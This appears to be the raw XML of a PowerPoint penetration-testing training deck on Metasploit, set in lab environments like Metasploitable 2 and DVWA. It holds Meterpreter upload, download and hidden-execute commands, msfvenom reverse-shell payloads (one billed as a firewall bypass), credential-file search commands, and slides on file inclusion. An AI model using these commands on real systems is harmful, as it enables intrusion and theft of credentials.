        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3304448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10006013" cy="635000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exploits And Metasploit – Meterpreter Upload-Download-Execute Functions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26422" y="3379093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meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> execute -f “c:\\remote\\path\\on windows”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execute -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Hidden execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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6422" y="5017877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meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>download c:\\remote\\path\\on windows    /root/local/path/of/kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng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26423" y="2017308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u="sng" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>upload /path/to/file/in/kali/file.exe      c:\\remote\\path\\on windows</a:t>
            </a:r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9396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Upload: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422" y="3021366"/>
            <a:ext cx="9890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Execute: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2" y="4648545"/>
            <a:ext cx="12293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Download:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403977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8372475" cy="815975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exploits And Metasploit – Auto Internal File Enumeration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423" y="2179233"/>
            <a:ext cx="110598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 post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enum_files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FILE_GLOBS *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OR *.rtf OR *.txt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search_from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> c:\\users\\ptbox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session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run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893716"/>
            <a:ext cx="12868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Metasploit:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688754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617538"/>
            <a:ext cx="10086975" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exploits And Metasploit – Internal File Enumeration - Cli version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423" y="2017308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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /s *pass* == *cred* == *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* == *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*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dirty="0"/>
              <a:t>findstr /si password *.xml *.ini *.txt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22721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Searching commands:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1543092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704850"/>
            <a:ext cx="10006013" cy="635000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exploits And Metasploit – Firewall Bypass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423" y="2017308"/>
            <a:ext cx="1105988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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp_allports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=10.0.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4444 -f exe &gt; shell.exe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167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Create Payload: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423" y="2819067"/>
            <a:ext cx="2431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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> routing: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6422" y="3899943"/>
            <a:ext cx="21307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Set listener payload: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6423" y="4191860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windows/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp_allports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26422" y="5088070"/>
            <a:ext cx="2310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Flush </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> routing: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26422" y="5379987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iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -F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8C0EFED-925F-445B-BB74-7BCC0257D6B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225846" y="3283026"/>
            <a:ext cx="838016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>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iptables -t nat -A PREROUTING -p tcp --dport 4444:5556 -j REDIRECT --to-port 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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1334808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10006013" cy="635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Exploits And Metasploit – File Upload #1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26423" y="2017308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User: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfadmin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Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfadmin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2942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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 2 login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/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09048" y="4134222"/>
            <a:ext cx="12572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Swap shell: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2157" y="4511546"/>
            <a:ext cx="1105988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python -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("/bin/bash")'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422" y="2980967"/>
            <a:ext cx="142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DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/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6422" y="3280732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User: admin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Password: password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16841764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0" y="479425"/>
            <a:ext cx="10006013" cy="635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Exploits And Metasploit – File Upload #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t>2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226423" y="2017308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User: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfadmin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Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfadmin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6423" y="1731791"/>
            <a:ext cx="29427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err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 2 login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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6422" y="4244391"/>
            <a:ext cx="16769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Create Payload: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26422" y="4529908"/>
            <a:ext cx="11059886" cy="36933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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=192.168.56.101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4444 -f raw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226422" y="2980967"/>
            <a:ext cx="1424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DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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26422" y="3280732"/>
            <a:ext cx="110598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User: admin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Password: password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6422" y="5132753"/>
            <a:ext cx="1057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Listener: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0115" y="5434783"/>
            <a:ext cx="110598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set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp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1590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42B17F1-CA23-4222-9218-11F67D98EC5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024569" y="2594472"/>
            <a:ext cx="10253030" cy="7694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4400">
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Inclusão de arquivos - File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="4400" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>LFI &amp; RFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>​</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400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154043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עיצוב מותאם אישית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56E03BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Crie um novo documento." ma:contentTypeScope="" ma:versionID="22ff5d0a66fe176ebb507ab62aa1c3de">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a8df32aad410ccae5763d30ffd13a2a2" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd235044f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e1bb88-64f6-4f17-8933-73fd235044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023C0E-830F-4443-A2D9-E86969F1AEEF}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1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de1bb88-64f6-4f17-8933-73fd235044ff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D71FE95-8DAA-4161-9D6C-C9B66D2863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6597A19-92BB-4D5B-82BA-42D8B9027A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de1bb88-64f6-4f17-8933-73fd235044f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17378</TotalTime>
  <Words>532</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>76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1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>עיצוב מותאם אישית</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploits e Metasploit</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – Meterpreter Upload-Download-Execute Functions</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – Auto Internal File Enumeration</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – Internal File Enumeration - Cli version</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – Firewall Bypass</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – File Upload #1</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – File Upload #2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – File Inclusion LFI &amp; RFI</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – Local File Inclusions [LFI] (Inclusão local de arquivos)</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – LFI - Log Injection</vt:lpstr>
      <vt:lpstr>Exploits And Metasploit – LFI - Log Injection (SSH)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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>78</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-24T13:17:06Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>